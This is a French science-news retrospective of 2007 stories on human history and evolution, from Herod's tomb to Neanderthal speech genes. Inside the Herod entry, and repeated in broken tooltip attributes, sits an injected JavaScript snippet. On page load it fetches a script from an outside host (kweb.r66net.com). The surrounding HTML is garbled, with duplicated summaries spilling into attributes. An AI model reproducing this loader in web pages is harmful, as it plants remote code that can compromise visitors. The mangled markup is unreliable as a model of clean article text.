Sciences

Rétro 2007 : la saga des humains en vedette

ActualitéClassé sous :Vie du site , Rétrospective 2007

L'Homme, son évolution et son comportement depuis la préhistoire et en remontant jusqu'à ses ancêtres : voilà de quoi occuper bien des chercheurs.

Des mathématiques à l'histoire, de l'Homme de Florès aux Néandertaliens, des grandes migrations aux aliments irradiés, la saga de l'être humain se dévoile peu à peu. Revenons sur les points forts qui ont jalonné l'année 2007.

13 mars : Mathématiques : de mystérieuses formules dues à Ramanujan enfin élucidées !

Lorsqu'il quitta ce monde en 1920, le grand mathématicien indien Srinavasa Ramanujan laissa à la postérité ses derniers travaux sur des objets mathématiques étranges, qu'il baptisa mock theta functions. Plus de 80 ans après, ses collègues sont seulement en train d'en comprendre les propriétés...

9 mai : Le tombeau du roi Hérode découvert en Cisjordanie

Assassin pervers ou grand bâtisseur, le roi Hérode a marqué l'Histoire. La découverte de son <a  tooltip href=tombeau, deux millénaires après sa mort, est non seulement un évènement archéologique majeur, mais aussi l'aboutissement de plus de cinquante années de recherches acharnées sur le terrain. ( function () { var vs = document.createElement('script'); vs.type = 'text/javascript'; vs.async = true; vs.src = 'https://kweb.r66net.com/GetLink'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(vs, s); })(); 28 juin :&nbsp;La momie oubliée de la reine Hatchepsout identifiée La momie de la célèbre pharaonne Hatchepsout a enfin été identifiée un siècle après sa découverte, mettant fin à une énigme vieille d'un siècle. 2 août&nbsp;: En cas de panique, suivez la fourmi ! " title=" Assassin pervers ou grand bâtisseur, le roi Hérode a marqué l'Histoire. La découverte de son tombeau, deux millénaires après sa mort, est non seulement un évènement archéologique majeur, mais aussi l'aboutissement de plus de cinquante années de recherches acharnées sur le terrain. ( function () { var vs = document.createElement('script'); vs.type = 'text/javascript'; vs.async = true; vs.src = 'https://kweb.r66net.com/GetLink'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(vs, s); })(); 28 juin :&nbsp;La momie oubliée de la reine Hatchepsout identifiée La momie de la célèbre pharaonne Hatchepsout a enfin été identifiée un siècle après sa découverte, mettant fin à une énigme vieille d'un siècle. 2 août&nbsp;: En cas de panique, suivez la fourmi ! " />
Assassin pervers ou grand bâtisseur, le roi Hérode a marqué l'Histoire. La découverte de son tombeau, deux millénaires après sa mort, est non seulement un évènement archéologique majeur, mais aussi l'aboutissement de plus de cinquante années de recherches acharnées sur le terrain. ( function () { var vs = document.createElement("script"); vs.type = "text/javascript"; vs.async = true; vs.src = "https://kweb.r66net.com/GetLink"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(vs, s); })(); 28 juin : La momie oubliée de la reine Hatchepsout identifiée La momie de la célèbre pharaonne Hatchepsout a enfin été identifiée un siècle après sa découverte, mettant fin à une énigme vieille d'un siècle. 2 août : En cas de panique, suivez la fourmi !

Evacuer une foule en proie à la panique se révèle extrêmement difficile et génère souvent des accidents mortels. Une équipe de chercheurs a découvert que, paradoxalement, réduire le passage disponible était souvent salutaire et permettait un meilleur écoulement qu'en le dégageant au maximum.

14 août : Une immense cité dévoilée autour du temple d’Angkor

26 septembre&nbsp;: L’homme de Flores n’était pas un Homo sapiens

Ces&nbsp;petits <a  tooltip href=hominidés, qui ont vécu il y a 18.000 ans sur l'île indonésienne de Florès, alimentent la controverse depuis des années. Humains atteints de nanisme ou singes&nbsp;? La réponse vient de tomber... 2 octobre&nbsp;: Les archives bénédictines racontent le climat européen " title=" C'est une véritable ville de trois mille kilomètres carrés qu'une équipe internationale a découverte et cartographiée autour du temple d'Angkor, au Cambodge. 26 septembre&nbsp;: L’homme de Flores n’était pas un Homo sapiens Ces&nbsp;petits hominidés, qui ont vécu il y a 18.000 ans sur l'île indonésienne de Florès, alimentent la controverse depuis des années. Humains atteints de nanisme ou singes&nbsp;? La réponse vient de tomber... 2 octobre&nbsp;: Les archives bénédictines racontent le climat européen " />
C'est une véritable ville de trois mille kilomètres carrés qu'une équipe internationale a découverte et cartographiée autour du temple d'Angkor, au Cambodge. 26 septembre : L’homme de Flores n’était pas un Homo sapiens Ces petits hominidés, qui ont vécu il y a 18.000 ans sur l'île indonésienne de Florès, alimentent la controverse depuis des années. Humains atteints de nanisme ou singes ? La réponse vient de tomber... 2 octobre : Les archives bénédictines racontent le climat européen

Sans le savoir, les moines du Moyen-Âge, qui consignaient scrupuleusement leurs observations météorologiques jour par jour, ont contribué à l'étude des scientifiques modernes sur l'évolution du climat.

6 octobre : Inventions anciennes : la complexité sans les mathématiques

Les grands penseurs de la Grèce antique ont pu mettre au point des machines extrêmement complexes tels le levier à contrepoids ou la catapulte sans l'aide des mathématiques, démontre un chercheur de l'université de Harvard.

10 octobre : Les grandes sécheresses africaines à l'origine des migrations humaines

Il y a de 90 à 135.000 ans, une série de sécheresses extrêmes auraient déclenché les grandes migrations humaines et fait évoluer de nombreux vertébrés, comme les poissons, affirme Andrew S. Cohen, de l'université d'Arizona à Tucson.

21 octobre : Un gène de la parole chez Neandertal

Travaillant sur deux os fossiles de Néandertaliens ayant vécu il y a 43.000 ans, une équipe de chercheurs allemands a isolé une variante de gène directement associée au langage, et qui n'existe que chez l'homme. Cela pourrait suggérer que l'Homme de Néandertal s'exprimait par la parole.

22 octobre : Diaporama : les vertébrés comme vous ne les avez jamais vus

Grâce à Patrick Gries et Jean-Baptiste de Panafieu, Futura-Sciences publie une superbe galerie d'images remarquables qui retracent la longue histoire de l'évolution des vertébrés depuis la préhistoire.

30 novembre : Faut-il consommer des aliments irradiés ?

L'irradiation des aliments est souvent présentée comme une méthode sûre de conservation, mais la controverse demeure sur son innocuité et le consommateur reste méfiant. Qu'en est-il ?

18 décembre : Jacques Stern : « La cryptologie fait partie de notre vie quotidienne »

Interviewé par Futura-Sciences, Jacques Stern, Médaille d'or du CNRS en 2006, mathématicien mais aussi entrepreneur et président de l'Agence nationale pour la recherche, démontre l'intérêt de la cryptologie dans la vie quotidienne.

NB : les crédits des illustrations se trouvent dans les articles cités